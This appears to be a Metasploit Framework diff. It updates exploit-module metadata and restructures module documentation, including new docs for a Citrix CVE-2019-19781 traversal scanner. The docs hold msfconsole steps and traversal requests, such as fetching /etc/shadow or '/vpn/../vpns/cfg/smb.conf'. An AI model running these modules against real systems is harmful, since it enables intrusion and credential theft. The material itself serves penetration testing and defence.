    "path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vuplayer_m3u",
@@ -113258,7 +113590,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/wm_downloader_m3u",
@@ -113301,7 +113633,7 @@
    "targets": [
      "Windows XP SP2 / SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/xenorate_xpl_bof",
@@ -113388,7 +113720,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/xradio_xrl_sehbof",
@@ -115680,7 +116012,7 @@
    "targets": [
      "Windows XP SP3 / Windows Vista"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/ftp/scriptftp_list.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/scriptftp_list",
@@ -118481,7 +118813,7 @@
      "Efmws 5.3 Universal",
      "Efmws 4.0 Universal"
    ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-01-05 21:39:34 +0000",
    "path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/efs_fmws_userid_bof",
@@ -127820,7 +128152,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2018-07-27 11:35:31 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/mov_ss.rb",
    "is_install_path": true,
    "ref_name": "windows/local/mov_ss",
@@ -128550,7 +128882,7 @@
    "targets": [
      "Windows 7 SP1"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/ms16_016_webdav.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ms16_016_webdav",
@@ -129088,7 +129420,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence",
@@ -129129,7 +129461,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-11-16 04:58:02 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence_image_exec_options",
@@ -129179,6 +129511,54 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/plantronics_hub_spokesupdateservice_privesc": {
+    "name": "Plantronics Hub SpokesUpdateService Privilege Escalation",
+    "fullname": "exploit/windows/local/plantronics_hub_spokesupdateservice_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-30",
+    "type": "exploit",
+    "author": [
+      "Markus Krell",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "The Plantronics Hub client application for Windows makes use of an\n        automatic update service `SpokesUpdateService.exe` which automatically\n        executes a file specified in the `MajorUpgrade.config` configuration\n        file as SYSTEM. The configuration file is writable by all users by default.\n\n        This module has been tested successfully on Plantronics Hub version 3.13.2\n        on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2019-15742",
+      "EDB-47845",
+      "URL-https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-03 20:32:01 +0000",
+    "path": "/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/plantronics_hub_spokesupdateservice_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/powershell_cmd_upgrade": {
    "name": "Windows Command Shell Upgrade (Powershell)",
    "fullname": "exploit/windows/local/powershell_cmd_upgrade",
@@ -129503,7 +129883,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-03-29 18:14:56 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/registry_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/registry_persistence",
@@ -129911,7 +130291,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/wmi_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/wmi_persistence",
@@ -135503,7 +135883,7 @@
    "targets": [
      "MySQL on Windows"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
    "is_install_path": true,
    "ref_name": "windows/mysql/mysql_start_up",
@@ -136745,7 +137125,7 @@
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)",
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)"
    ],
-    "mod_time": "2019-10-30 22:20:36 +0000",
+    "mod_time": "2020-01-12 08:19:44 +0000",
    "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -137033,7 +137413,7 @@
      "CoDeSys v2.3 on Windows XP SP3",
      "CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/scada/codesys_web_server.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/codesys_web_server",
@@ -138448,7 +138828,7 @@
      "Execute payload",
      "Neutralize implant"
    ],
-    "mod_time": "2019-11-25 18:26:37 +0000",
+    "mod_time": "2020-01-22 16:37:36 +0000",
    "path": "/modules/exploits/windows/smb/doublepulsar_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/doublepulsar_rce",
@@ -143800,7 +144180,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 17:34:47 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_lua",
@@ -145236,7 +145616,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 17:34:47 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_lua",
@@ -169269,7 +169649,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-02 15:33:48 +0000",
+    "mod_time": "2019-12-14 15:58:45 +0000",
    "path": "/modules/post/windows/gather/enum_patches.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_patches",
@@ -56,7 +56,7 @@ All of the leaked versions are available in the module

 `**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/admin/cisco/cisco_asa_extrabacon`
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet.
 An authenticated user can abuse this servlet to download arbitrary files as root by specifying
@@ -8,21 +8,7 @@ This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and
 work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
 (see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.

-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld
-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb
-https://seclists.org/fulldisclosure/2019/Jul/7
-
-
-## Usage
+## Scenarios

 Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!

@@ -8,7 +8,7 @@ Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain a
 4. Do: ```set CMD [command]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec
@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200/r201 devices to read arbitrary files off the file system. Affected versions - 4.3.3-R4 and prior.

 ## Verification Steps
@@ -8,7 +10,7 @@ This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200
 4. Do: ```set FILENAME [filename]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_fpt
@@ -8,7 +8,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
 4. Do: ```set CMD [COMMAND]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec
@@ -9,7 +9,7 @@ This module exploits an access control vulnerability in Cambium ePMP device mana
 5. Do: ```set NEW_PASSWORD newpass```
 6. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use use auxiliary/scanner/http/epmp1000_reset_pass
@@ -15,7 +15,7 @@ attacker on the local network can send a crafted request to broadcast a fake vid

 Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.

-## Sample Output
+## Scenarios

 ```
 msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
@@ -64,7 +64,7 @@ msf auxiliary(phoenix_command) > run
 [*] Auxiliary module execution completed
 ```

-## Module Options
+## Options
 ```
 msf auxiliary(phoenix_command) > show options

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
 collection of phone numbers of the same carrier.

 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.

-## Module Options
+## Options

 **CELLNUMBERS**

@@ -74,7 +76,7 @@ in order to receive the text, such as AT&T.

 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.

-## Supported Carrier Gateways
+### Supported Carrier Gateways

 The module supports the following carriers:

@@ -84,14 +86,14 @@ The module supports the following carriers:
 * Verizon
 * Google Fi

-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number

 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:

 http://freecarrierlookup.com/

-## Gmail SMTP Example
+### Gmail SMTP Example

 Gmail is a popular mail server, so we will use this as a demonstration.

@@ -111,7 +113,7 @@ After creating the application password, configure auxiliary/client/mms/send_mms

 And you should be ready to go.

-## Yahoo SMTP Example
+### Yahoo SMTP Example

 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -136,7 +138,7 @@ After configuring your Yahoo account, configure auxiliary/client/mms/send_mms th

 And you're good to go.

-## Demonstration
+## Scenarios

 After setting up your mail server and the module, your output should look similar to this:

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
 of phone numbers of the same carrier.

 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.

-## Module Options
+## Options

 **CELLNUMBERS**

@@ -57,7 +59,7 @@ The password you use to log into the SMTP server.

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.

-## Supported Carrier Gateways
+### Supported Carrier Gateways

 The module supports the following carriers:

@@ -73,7 +75,7 @@ The module supports the following carriers:
 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
 not supported.

-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number

 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
@@ -82,7 +84,7 @@ http://freecarrierlookup.com/

 **Note:** If the phone is using Google Fi, then it may appear as a different carrier.

-## Gmail SMTP Example
+### Gmail SMTP Example

 Gmail is a popular mail server, so we will use this as a demonstration.

@@ -100,7 +102,7 @@ After creating the application password, configure auxiliary/client/sms/send_tex

 And you should be ready to go.

-## Yahoo SMTP Example
+### Yahoo SMTP Example

 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -123,7 +125,7 @@ After configuring your Yahoo account, configure auxiliary/client/sms/send_text t

 And you're good to go.

-## Demonstration
+### Scenarios

 After setting up your mail server and the module, your output should look similar to this:

@@ -3,7 +3,7 @@ This module triggers a Denial of Service vulnerability in the Flexense Enterpris
 a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.  


-## Vulnerable Application 
+## Verification Steps
 According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
 Following list of softwares are vulnerable to Denial Of Service.
 read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065
@@ -15,7 +15,7 @@ Vulnerable app versions include:

 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

-## Verification
+## Verification Steps

 1. Start msfconsole
 1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
@@ -15,7 +15,7 @@ IBM Notes 8.5 release

 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 

-## Verification
+## Verification Steps

 Start msfconsole

@@ -55,7 +55,7 @@ at ../src/ephy-main.c line 432

 ```

-## Verification
+## Verification Steps

    Start msfconsole
    use auxiliary/dos/http/webkitplus
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module exploits three vulnerabilities in Advantech WebAccess.

@@ -12,9 +12,6 @@ The final vulnerability exploited is that the HTML Form on the user edit page co
 plain text password in the masked password input box. Typically the system should replace the
 actual password with a masked character such as "*".

-
-## Vulnerable Application
-
 Version 8.1 was tested during development:

 http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
@@ -41,7 +38,6 @@ The username to use to log into Advantech WebAccess. By default, there is a buil
 The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
 does not have a password, which could be something you can use.

-
-## Demo
+## Scenarios

 ![webaccess_steal_creds](https://cloud.githubusercontent.com/assets/1170914/22353246/34b2045e-e3e5-11e6-992c-f3ab9dcbe716.gif)
@@ -4,7 +4,7 @@ This module retrieves a browser's network interface IP addresses using WebRTC. H

 Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html

-## Verification
+## Verification Steps

    Start msfconsole
    use auxiliary/gather/browser_lanipleak
@@ -1,4 +1,7 @@
-The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+## Vulnerable Application
+
+The module use the Censys REST API to access the same data accessible through web interface.
+The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.

 ## Verification Steps

@@ -207,8 +210,3 @@ msf auxiliary(censys_search) > run
 [+] wesecure.nl - [997423]
 [*] Auxiliary module execution completed
 ```
-
-
-## References
-
-1. https://censys.io/api
@@ -9,7 +9,7 @@ accounts are enabled or disabled/locked out.
 To use kerberos_enumusers, make sure you are able to connect to the
 Kerberos service on a Domain Controller.

-## Scenario
+## Scenarios

 The following demonstrates basic usage, using a custom wordlist,
 targeting a single Domain Controller to identify valid domain user
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 Nuuo CMS Session Bruteforce

@@ -49,8 +49,6 @@ Secondly, due to the nature of this application, it is normal to have the softwa

 It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 

-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)

 - 1.5.2 OK
@@ -73,9 +71,3 @@ msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_bruteforce) >
 ```
-
-## References
-
-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 Nuuo CMS Authenticated Arbitrary File Download

@@ -26,8 +26,6 @@ This module works in the following way:

 Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.

-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)

 The following versions were tested:
@@ -63,9 +61,3 @@ msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_file_download) >
 ```
-
-## References
-
- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 External python module compatible with v2 and v3.

 Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
@@ -14,9 +16,7 @@ Microsoft Security Response Center stated on 2017-06-28 that this issue does not

 This script is maintaing the ability to run independently of MSF.

-## Vulnerable Application
-
-  Office365's implementation of ActiveSync
+Office365's implementation of ActiveSync is vulnerable.

 ## Verification Steps

@@ -41,6 +41,7 @@ This script is maintaing the ability to run independently of MSF.


 ## Scenarios
+
 The following demonstrates basic usage, using the supplied users wordlist
 and default options.

@@ -72,6 +73,3 @@ grimhacker.com  ..        |
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
-
-## References
-https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/
@@ -1,10 +1,11 @@
-## Description
-This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
-
 ## Vulnerable Application
+
 This Module was tested on Samsung Internet Browser 5.4.02.3 during development.

+This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
+
 ## Verification Steps
+
 1. Start `msfconsole -q`
 2. `use auxiliary/gather/samsung_browser_sop_bypass`
 3. `set SRVHOST`
@@ -14,6 +15,7 @@ This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 5. `run`

 ## Scenarios
+
 ```
 $ sudo msfconsole -q
 msf > use auxiliary/gather/samsung_browser_sop_bypass
@@ -49,8 +51,6 @@ host            origin          service          public          private
 msf auxiliary(samsung_browser_sop_bypass) >
 ```

-## Demos
-
 Working of MSF Module: `https://youtu.be/ulU98cWVhoI`

 Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`
@@ -1,5 +1,5 @@

-## About
+## Description

 This module simply queries the DB2 discovery service for information.
 The discovery service is integrated with the Configuration Assistant and the DB2® administration server.
@@ -12,9 +12,10 @@ Using the discovery method, catalog information for a remote server can be autom
 3. `set THREDS [number of threads]`
 4. `run`

-
 ## Scenarios
- DB2 `9.07.2` running at a `RHEL 6.9` .
+
+### DB2 9.07.2 on RHEL 6.9
+
 ```
 msf auxiliary(scanner/db2/discovery) > set RHOSTS 192.168.1.25
 msf auxiliary(scanner/db2/discovery) > run
@@ -1,10 +1,10 @@
+## Vulnerable Application
+
 This module exploits a directory traversal vulnerability in Easy File Sharing FTP Server 3.6, or
 prior. It abuses the RETR command in FTP in order to retrieve a file outside the shared directory.

 By default, anonymous access is allowed by the FTP server.

-## Vulnerable Application
-
 Easy File Sharing FTP Server version 3.6 or prior should be affected. You can download the
 vulnerable application from the official website:

@@ -22,6 +22,6 @@ The FTP server IP address.

 The file you wish to download. Assume this path starts from C:\

-## Demonstration
+## Scenarios

 ![ftp](https://cloud.githubusercontent.com/assets/1170914/23971054/4fdc2b08-099a-11e7-88ea-67a678628e49.gif)
@@ -1,9 +1,7 @@
-## Description
+## Vulnerable Application

 This module allows you to authenticate to Advantech WebAccess.

-## Vulnerable Application
-
 This module was specifically tested on versions 8.0, 8.1, and 8.2:

 **8.2 Download**
@@ -23,7 +21,6 @@ Note:
 By default, Advantech WebAccess comes with a built-in account named ```admin```, with a blank
 password.

-
 ## Verification Steps

 1. Make sure Advantech WebAccess is up and running
@@ -34,6 +31,6 @@ password.
 6. ```run```
 7. You should see that the module is attempting to log in.

-## Demo
+## Scenarios

 ![webaccess_login_demo](https://cloud.githubusercontent.com/assets/1170914/22352301/26549236-e3e1-11e6-9710-506166a8bee3.gif)
@@ -1,10 +1,9 @@
+## Vulnerable Application
+
 This module exploits a vulnerability found in Cisco Firepower Management console. A logged in
 user can abuse the report viewing feature to download an arbitrary file. Authentication is
 required to exploit this vulnerability.

-
-## Vulnerable Application
-
 This module was written specifically against Cisco Firepower Management 6.0.1 (build 1213) during
 development. To test, you may download the virtual appliance here:

@@ -26,6 +25,6 @@ admin:Admin123 by default:
 If the file is found, it will be saved in the loot directory. If not found, the module should
 print an error indicating so.

-## Demo
+## Scenarios

 ![cisco_download_demo](https://cloud.githubusercontent.com/assets/1170914/21782825/78ada38e-d67a-11e6-9b7b-c7b8e2956fba.gif)
@@ -0,0 +1,57 @@
+## Introduction
+
+An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. The vulnerability, tracked as CVE-2019-19781, allows for directory traversal. If exploited, it could allow an unauthenticated attacker to perform arbitrary code execution.
+
+Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains PERL scripts that can be targeted to allow for limited file writing on the vulnerable host.
+
+This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `[global]` since this configuration file should contain global variables. If `[global]` is found, the server is vulnerable to CVE-2019-19781.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/citrix_dir_traversal`
+4. Do: `set RHOSTS [IP]`
+5. Do: `run`
+
+## Options
+
+1. `Proxies`. This option is not set by default.
+2. `RPORT`. The default setting is `80`. To use: `set RPORT [PORT]`
+3. `SSL`. The default setting is `false`.
+4. `THREADS`. The default setting is `1`.
+5. `VHOST`. This option is not set by default.
+6. `TARGETURI`. This option is the base path. `/` by default.
+7. `PATH`. This option is the traversal path. `/vpn/../vpns/cfg/smb.conf` by default.
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > options
+
+Module options (auxiliary/scanner/http/citrix_dir_traversal):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   PATH       /vpn/../vpns/cfg/smb.conf  yes       Traversal path
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080                       yes       The target port (TCP)
+   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                          yes       Base path
+   THREADS    1                          yes       The number of concurrent threads (max one per host)
+   VHOST                                 no        HTTP server virtual host
+
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > run
+
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/citrix_dir_traversal) >
+```
+
+## References
+
+1. <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
+2. <https://support.citrix.com/article/CTX267027>
@@ -9,7 +9,7 @@ The device has at least two (2) users - admin and user. Due to an access control
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_web_login_loot
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module scans one or more web servers for interesting directories that can be further explored.

@@ -9,7 +9,7 @@ Related links :
 * https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
 * http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip - Download Oracle Glass Fish 4.1

-## Verification
+## Verification Steps

  1. Start msfconsole
  2. Do: ```use auxiliary/scanner/http/glassfish_traversal```
@@ -11,7 +11,7 @@ This module can abuse misconfigured web servers to upload and delete web content
 6. Do: ```set FILEDATA [PATH]```
 7. Do: ```run```

-## Options 
+## Options

 ### ACTION

@@ -1,13 +1,15 @@
-
-## Microsoft IIS shortname vulnerability scanner
-
-The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
-
 ## Vulnerable Application

-Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
-  
-  
+The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers
+to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request)
+this was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
+
+Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS 
+
+### Remediation
+
+Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
+
 ## Verification Steps

  1. Install IIS (default installations are vulnerable)
@@ -51,13 +53,3 @@ Older Microsoft IIS installations are vulnerable with GET, newer installations w
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host
 ```
-
-## Remediation
-
-Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
-
-
-## References
-
-  * https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
-  * https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability
@@ -12,7 +12,7 @@
  * [RIPS v0.54 Source](https://sourceforge.net/projects/rips-scanner/files/rips-0.54.zip/download)


-## Verification
+## Verification Steps

  1. Start `msfconsole`
  2. `use auxiliary/scanner/http/rips_traversal`
@@ -1,13 +1,11 @@
-## Description
+## Vulnerable Application

 This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
 Spring Cloud Config listens by default on port 8888.

-### Vulnerable Application
-
 * https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip

-## Verification
+## Verification Steps

 1. `./msfconsole`
 2. `use auxiliary/scanner/http/springcloud_traversal`
@@ -29,7 +27,3 @@ msf auxiliary(scanner/http/springcloud_traversal) > run
 [*] Auxiliary module execution completed
 msf auxiliary(scanner/http/springcloud_traversal) >
 ```
-
-## References
-
-* https://pivotal.io/security/cve-2019-3799
@@ -34,11 +34,15 @@ Affecting total.js package, versions:

 ## Options

-* **TARGETURI**: Path to Total.js App installation (“/” is the default)
-* **DEPTH**: Traversal depth (“1” is the default)
-* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+ **DEPTH**

-## Scenario
+  Traversal depth. Default is `1`
+
+ **FILE**
+
+  File to obtain. Default is `databases/settings.json`
+
+## Scenarios

 ### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0

@@ -0,0 +1,34 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.
+
+### Vulnerable Application
+
+* http://en.tvt.net.cn/upload/service/NVMS1000.zip
+
+## Verification
+
